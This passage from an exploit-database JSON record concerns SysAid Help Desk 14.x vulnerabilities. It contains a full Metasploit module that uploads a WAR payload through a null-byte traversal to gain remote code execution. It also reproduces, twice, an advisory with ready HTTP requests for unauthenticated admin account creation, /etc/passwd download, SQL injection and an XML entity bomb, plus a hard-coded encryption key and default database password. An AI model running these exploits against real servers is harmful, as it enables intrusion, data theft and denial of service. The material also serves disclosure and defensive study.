exploited.", "cvss3": {}, "published": "2015-07-20T00:00:00", "type": "zdt", "title": "SysAid Help Desk rdslogs Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2995"], "modified": "2015-07-20T00:00:00", "id": "1337DAY-ID-23898", "href": "https://0day.today/exploit/description/23898", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => \"SysAid Help Desk 'rdslogs' Arbitrary File Upload\",\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.\r\n The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated\r\n file uploads and handles zip file contents in a insecure way. Combining both weaknesses\r\n a remote attacker can accomplish remote code execution. Note that this will only work if the\r\n target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection\r\n against null byte injection in file names. This module has been tested successfully on version\r\n v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid\r\n seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability\r\n from being exploited.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-2995' ],\r\n [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]\r\n ],\r\n 'DefaultOptions' => { 'WfsDelay' => 30 },\r\n 'Privileged' => false,\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jun 3 2015'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptInt.new('SLEEP',\r\n [true, 'Seconds to sleep while we wait for WAR deployment', 15]),\r\n OptString.new('TARGETURI',\r\n [true, 'Base path to the SysAid application', '/sysaid/'])\r\n ], self.class)\r\n end\r\n\r\n\r\n def check\r\n servlet_path = 'rdslogs'\r\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'rdsName' => bogus_file\r\n }\r\n })\r\n\r\n if res && res.code == 200\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n\r\n def exploit\r\n app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n tomcat_path = '../../../../'\r\n servlet_path = 'rdslogs'\r\n\r\n # We need to create the upload directories before our first attempt to upload the WAR.\r\n print_status(\"#{peer} - Creating upload directory\")\r\n bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))\r\n send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),\r\n 'ctype' => 'application/xml',\r\n 'vars_get' => {\r\n 'rdsName' => bogus_file\r\n }\r\n })\r\n\r\n war_payload = payload.encoded_war({ :app_name => app_base }).to_s\r\n\r\n # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail\r\n print_status(\"#{peer} - Uploading WAR file...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' => Zlib::Deflate.deflate(war_payload),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'rdsName' => \"#{tomcat_path}/tomcat/webapps/#{app_base}.war\\x00\"\r\n }\r\n })\r\n\r\n # The server either returns a 200 OK when the upload is successful.\r\n if res && res.code == 200\r\n print_status(\"#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment\")\r\n register_files_for_cleanup(\"tomcat/webapps/#{app_base}.war\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - WAR upload failed\")\r\n end\r\n\r\n 10.times do\r\n select(nil, nil, nil, 2)\r\n\r\n # Now make a request to trigger the newly deployed war\r\n print_status(\"#{peer} - Attempting to launch payload in deployed WAR...\")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n 'method' => 'GET'\r\n })\r\n # Failure. The request timed out or the server went away.\r\n break if res.nil?\r\n # Success! Triggered the payload, should have a shell incoming\r\n break if res.code == 200\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-05] #", "sourceHref": "https://0day.today/exploit/23898", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T05:12:44", "description": "SysAid Help Desk version 14.4 suffers from code execution, denial of service, path disclosure, remote file upload, remote SQL injection, directory traversal, file download, and various other vulnerabilities.", "cvss3": {}, "published": "2015-06-04T00:00:00", "type": "zdt", "title": "SysAid Help Desk 14.4 Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-04T00:00:00", "id": "1337DAY-ID-23705", "href": "https://0day.today/exploit/description/23705", "sourceData": "Found lots of vulns in SysAid Help Desk 14.4, including RCE.\r\nSysAid have informed me they all have been fixed in 15.2, but no\r\nre-test was performed.\r\n\r\nFull advisory below, and a copy can be obtained at [1].\r\n5 Metasploit modules have been released and currently awaiting merge\r\nin the moderation queue [2].\r\n\r\nRegards,\r\nPedro\r\n\r\n[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt\r\n[2]:\r\nhttps://github.com/rapid7/metasploit-framework/pull/5470\r\nhttps://github.com/rapid7/metasploit-framework/pull/5471\r\nhttps://github.com/rapid7/metasploit-framework/pull/5472\r\nhttps://github.com/rapid7/metasploit-framework/pull/5473\r\nhttps://github.com/rapid7/metasploit-framework/pull/5474\r\n\r\n>> Multiple vulnerabilities in SysAid Help Desk 14.4\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n=================================================================================\r\nDisclosure: 03/06/2015 / Last updated: 03/06/2015\r\n\r\n>> Background on the affected product:\r\n\"SysAid is an ITSM solution that offers all the essentials, with\r\neverything you need for easy and efficient IT support and effective\r\nhelp desk operations. Its rich set of features includes a powerful\r\nservice desk, asset management and discovery, self-service, and\r\neasy-to-use tools for understanding and optimizing IT performance.\"\r\n\r\nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been\r\nreleased and should be integrated in the Metasploit framework soon.\r\nAll vulnerabilities affect both the Windows and Linux versions unless\r\notherwise noted.\r\n\r\n\r\n>> Technical details:\r\n1)\r\nVulnerability: Administrator account creation\r\nCVE-2015-2993 (same CVE as #10)\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123\r\n\r\nThis creates an account with the following credentials: mr_lit:secret\r\nNote that this vulnerability only seems to be exploitable ONCE!\r\nSubsequent attempts to exploit it will fail even if the tomcat server\r\nis restarted.\r\n\r\n\r\n2)\r\nVulnerability: File upload via directory traversal (authenticated;\r\nleading to remote code execution)\r\nCVE-2015-2994\r\nConstraints: valid administrator account needed (see #1 to create a\r\nvalid admin account)\r\nAffected versions: unknown, at least 14.4\r\n\r\n\r\nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1\r\nContent-Type: multipart/form-data;\r\nboundary=---------------------------81351919525780\r\n\r\n-----------------------------81351919525780\r\nContent-Disposition: form-data; name=\"activation\"; filename=\"whatevs.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<html><body><%out.println(System.getProperty(\"os.name\"));%></body><html>\r\n-----------------------------81351919525780--\r\n\r\n\r\nThe response returns a page which contains the following:\r\n var imageUrl =\r\n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501\";\r\n var thumbUrl =\r\n\"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501\";\r\n if(imageUrl != null && $.trim(imageUrl).length > 0)\r\n {\r\n document.getElementById(\"cropbox\").src = imageUrl;\r\n document.getElementById(\"preview\").src = thumbUrl;\r\n parent.glSelectedImageUrl =\r\n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp\";\r\n\r\nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp\r\nto execute the JSP.\r\n\r\n\r\n3)\r\nVulnerability: File upload via directory traversal (unauthenticated;\r\nleading to remote code execution)\r\nCVE-2015-2995\r\nConstraints: no authentication or any other information needed. The\r\nserver has to be running Java 7u25 or lower. This is because Java 7u40\r\n(FINALLY!) rejects NULL bytes in file paths. See\r\nhttp://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more\r\ndetails.\r\nAffected versions: unknown, at least 14.3 and 14.4\r\n\r\nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00\r\n<... WAR payload here ...>\r\n\r\n\r\n4)\r\nVulnerability: Arbitrary file download\r\nCVE-2015-2996 (same CVE as #8)\r\nConstraints: none; no authentication or any other information needed\r\n(see #5 to obtain the traversal path)\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\r\n\r\n\r\n5)\r\nVulnerability: Path disclosure\r\nCVE-2015-2997\r\nConstraints: none; no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4; only works on the Linux version\r\n\r\nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>\r\n\r\nMetasploit PoC:\r\n\r\n large_traversal = '../' * rand(15...30)\r\n servlet_path = 'getAgentLogFile'\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\r\n 'method' => 'POST',\r\n 'data' =>\r\nZlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) +\r\nrand(300))),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'accountId' => large_traversal +\r\nRex::Text.rand_text_alphanumeric(8 + rand(10)),\r\n 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))\r\n }\r\n })\r\n\r\nThe response (res.body.to_s) will be similar to:\r\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\r\n<HTML>\r\n<HEAD><TITLE>Error</TITLE></HEAD>\r\n<BODY>\r\n<H1>Internal Error No#14</H1>\r\n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip\r\n(Permission denied)</H2>\r\n</BODY></HTML>\r\n\r\nThe tomcat path is revealed between the H2 tags.\r\n\r\n\r\n6)\r\nVulnerability: Use of hard-coded cryptographic key\r\nCVE-2015-2998\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nSysAid Help Desk uses a hard-coded encryption key and encryption\r\nparameters. If this is combined with an arbitrary file download\r\nvulnerability (such as #4), a malicious user can then decrypt the\r\ndatabase password by downloading the WEB-INF/conf/serverConf.xml file.\r\nAlgorithm: DES password based encryption with MD5 hash\r\nKey: \"inigomontoya\"\r\nSalt: [-87, -101, -56, 50, 86, 53, -29, 3]\r\nIterations: 19\r\n\r\n\r\n7)\r\nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp\r\nCVE-2015-2999\r\nConstraints: valid administrator account needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/genericreport HTTP/1.1\r\naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ngroupFilter\r\n\r\naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no\r\n\r\nParameters:\r\ncustomSQL\r\n\r\naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin\r\n\r\nParameters:\r\ncustomSQL\r\n\r\n(3 different payloads are shown because the reportName parameter seems\r\nto change which parameters have the injection)\r\n\r\n\r\nb)\r\nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE\r\nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=\r\n\r\nParameter:\r\ndir\r\n\r\n\r\nc)\r\nPOST /sysaid/RFCGantt.jsp HTTP/1.1\r\nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true\r\n\r\nAccepts injection between $$ in ganttSQL parameter.\r\n\r\n\r\n8)\r\nVulnerability: Denial of service\r\nCVE-2015-2996 (same CVE as #4)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero\r\n\r\nThis request will cause the cpu to go to 100% and the memory to\r\nballoon for 30+ seconds. Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n9)\r\nVulnerability: XML Entity Expansion (leading to denial of service)\r\nCVE-2015-3000\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\na)\r\nPOST /sysaid/agententry?deflate=0\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE lolz [\r\n <!ENTITY lol \"lol\">\r\n <!ELEMENT lolz (#PCDATA)>\r\n <!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\r\n <!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\r\n <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\r\n <!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\r\n <!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">\r\n <!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\r\n <!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\r\n <!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\r\n <!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\r\n]>\r\n<lolz>&lol9;</lolz>\r\n\r\nb)\r\nPOST /sysaid/rdsmonitoringresponse\r\n<lol bomb in POST data>\r\n\r\nc)\r\nPOST /sysaid/androidactions\r\n<lol bomb in POST data>\r\n\r\nThese requests will cause the cpu to go to 100% and the memory to\r\nbaloon for 10+ seconds. Sending lots of requests causes the server to\r\nslow down to a crawl (although it doesn't seem to crash or hang\r\nforever).\r\n\r\n\r\n10)\r\nVulnerability: Uncontrolled file overwrite\r\nCVE-2015-2993 (same CVE as #1)\r\nConstraints: no authentication or any other information needed\r\nAffected versions: unknown, at least 14.4\r\n\r\nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm\r\n\r\nThis will overwrite the file with \"SysAid\". This string is fixed and\r\ncannot be controlled by the attacker.\r\n\r\n\r\n11)\r\nVulnerability: Use of hard-coded password for the SQL Server Express\r\nadministrator account\r\nCVE-2015-3001\r\nConstraints: N/A\r\nAffected versions: unknown, at least 14.4\r\n\r\nWhen installing SysAid on Windows with the built in SQL Server\r\nExpress, the installer sets the sa user password to \"Password1\".\r\n\r\n\r\n>> Fix:\r\nUpgrade to version 15.2 or higher.\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/23705", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T12:23:28", "description": "The RdsLogsEntry servlet in SysAid Help Desk before 15.2 does not properly check file extensions, which allows remote attackers to upload and execute arbitrary files via a NULL byte after the extension, as demonstrated by a .war%00 file.", "cvss3": {}, "published": "2015-06-08T14:59:00", "type": "cve", "title": "CVE-2015-2995", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2995"], "modified": "2018-10-09T19:56:00", "cpe": ["cpe:/a:sysaid:sysaid:15.1"], "id": "CVE-2015-2995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2995", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sysaid:sysaid:15.1:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nSysAid Help Desk 14.4 - Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2015-06-10T00:00:00", "title": "SysAid Help Desk 14.4 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-10T00:00:00", "id": "EXPLOITPACK:731246BBF736D94C1AB6AB77C5502B82", "href": "", "sourceData": ">> Multiple vulnerabilities in SysAid Help Desk 14.4\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 03/06/2015 / Last updated: 10/06/2015\n\n>> Background on the affected product:\n\"SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance.\"\n\nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon.\nAll vulnerabilities affect both the Windows and Linux versions unless otherwise noted.\n\n\n>> Technical details:\n1)\nVulnerability: Administrator account creation\nCVE-2015-2993 (same CVE as #10)\nConstraints: none; no authentication or any other information needed\nAffected versions: unknown, at least 14.4\n\nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123\n\nThis creates an account with the following credentials: mr_lit:secret\nNote that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted.\n\n\n2)\nVulnerability: File upload via directory traversal (authenticated; leading to remote code execution)\nCVE-2015-2994\nConstraints: valid administrator account needed (see #1 to create a valid admin account)\nAffected versions: unknown, at least 14.4\n\n\nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------------81351919525780\n\n-----------------------------81351919525780\nContent-Disposition: form-data; name=\"activation\"; filename=\"whatevs.jsp\"\nContent-Type: application/octet-stream\n\n<html><body><%out.println(System.getProperty(\"os.name\"));%></body><html>\n-----------------------------81351919525780--\n\n\nThe response returns a page which contains the following:\n var imageUrl = \"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501\";\n var thumbUrl = \"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501\";\n if(imageUrl != null && $.trim(imageUrl).length > 0)\n {\n document.getElementById(\"cropbox\").src = imageUrl;\n document.getElementById(\"preview\").src = thumbUrl;\n parent.glSelectedImageUrl = \"icons/user_photo/14222767515000.1049804910604456_temp.jsp\";\n \nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP.\n\n\n3)\nVulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution)\nCVE-2015-2995\nConstraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details.\nAffected versions: unknown, at least 14.3 and 14.4\n\nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00\n<... WAR payload here ...>\n\n\n4)\nVulnerability: Arbitrary file download\nCVE-2015-2996 (same CVE as #8)\nConstraints: none; no authentication or any other information needed (see #5 to obtain the traversal path)\nAffected versions: unknown, at least 14.4\n\nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\n\n\n5)\nVulnerability: Path disclosure\nCVE-2015-2997\nConstraints: none; no authentication or any other information needed\nAffected versions: unknown, at least 14.4; only works on the Linux version\n\nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters>\n\nMetasploit PoC:\n\n large_traversal = '../' * rand(15...30)\n servlet_path = 'getAgentLogFile'\n \n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),\n 'method' => 'POST',\n 'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),\n 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))\n }\n })\n \nThe response (res.body.to_s) will be similar to:\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD><TITLE>Error</TITLE></HEAD>\n<BODY>\n<H1>Internal Error No#14</H1>\n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2>\n</BODY></HTML>\n\nThe tomcat path is revealed between the H2 tags.\n\n\n6)\nVulnerability: Use of hard-coded cryptographic key\nCVE-2015-2998\nConstraints: N/A\nAffected versions: unknown, at least 14.4\n\nSysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file.\nAlgorithm: DES password based encryption with MD5 hash\nKey: \"inigomontoya\"\nSalt: [-87, -101, -56, 50, 86, 53, -29, 3]\nIterations: 19\n\n\n7)\nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp\nCVE-2015-2999\nConstraints: valid administrator account needed\nAffected versions: unknown, at least 14.4\n\na)\nPOST /sysaid/genericreport HTTP/1.1\naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin\n\naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no\n\naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin\n\nParameters:\ngroupFilter\ncustomSQL\n\n(3 sample payloads are shown - the reportName has to be valid and each reportName expects different parameters)\n\n\nb)\nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE\nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo=\n\nParameter:\ndir\n\n\nc)\nPOST /sysaid/RFCGantt.jsp 